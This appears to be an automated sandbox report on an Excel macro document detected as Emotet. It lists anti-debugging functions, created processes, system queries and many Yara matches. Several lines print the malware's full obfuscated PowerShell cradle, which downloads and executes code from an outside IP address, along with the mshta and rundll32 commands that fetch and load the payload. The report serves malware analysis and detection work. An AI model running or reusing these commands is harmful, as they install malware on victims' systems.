Anti Debugging
barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018D374 mov eax, dword ptr fs:[00000030h] 9_2_0018D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023D374 mov eax, dword ptr fs:[00000030h] 10_2_0023D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CD374 mov eax, dword ptr fs:[00000030h] 11_2_001CD374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0078D374 mov eax, dword ptr fs:[00000030h] 12_2_0078D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0060D374 mov eax, dword ptr fs:[00000030h] 14_2_0060D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001ED374 mov eax, dword ptr fs:[00000030h] 15_2_001ED374
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 9_2_10002280
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 9_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 9_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_1003ACCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 11_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 11_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_1003ACCC

HIPS / PFW / Operating System Protection Evasion
barindex
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/qqw/aas/se.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",MOdnuTnMIi Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",NSMcfMaGRbKFCL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",NscZMRYpRiE Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DwOwDiNvSb Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DllRegisterServer Jump to behavior
Yara detected Xls With Macro 4.0
Source: Yara match File source: DETAILS-145.xls, type: SAMPLE
Source: Yara match File source: C:\Users\user\Desktop\DETAILS-145.xls, type: DROPPED

Language, Device and Operating System Detection
barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 9_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 9_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 9_2_10014B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 11_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 11_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 11_2_10014B71
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 9_2_1003906D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 9_2_1003CE1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA, 9_2_100453C8

Stealing of Sensitive Information
barindex
Yara detected Emotet
Source: Yara match File source: 17.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2810000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f40000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2380000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2380000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ed0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.25f0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2320000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.23e0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.910000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e80000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a40000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2f30000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a70000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.5f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2670000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2860000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.25c0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2590000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.25f0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2410000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f40000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e40000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.7a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.24d0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.a60000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2350000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.28e0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.26b0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2280000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e50000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3d0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ed0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.820000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.26b0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e20000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.31d0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.8a0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2fd0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.ae0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.23d0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.910000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2960000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2250000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2eb0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2730000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3170000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a40000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.170000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.23d0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2350000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.770000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.7a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.ae0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.370000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.a60000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2f30000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e40000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.27a0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2960000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.23e0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3d0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.28e0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.370000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8e0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2590000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.22b0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.22b0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.910000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.27a0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e50000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.10000000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.574709897.0000000000230000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522412460.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.574966326.0000000000911000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.521968966.0000000000400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575355954.00000000024D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.682108397.0000000000231000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522161075.0000000002381000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522361954.0000000002861000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522256343.0000000002731000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673081131.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616094913.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.577991543.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522563448.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522208158.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575698621.0000000002671000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675215228.0000000002E21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675330890.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.677230667.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522291162.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575069937.0000000002281000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575241988.0000000002381000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575278324.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.678452410.0000000000241000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.524549461.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673490791.0000000002251000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616750004.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616484887.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.687313669.0000000010001000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616301764.00000000008A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673601215.0000000002811000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675278836.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616955117.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673042649.0000000000220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.577507576.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616430850.0000000000A71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616392195.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
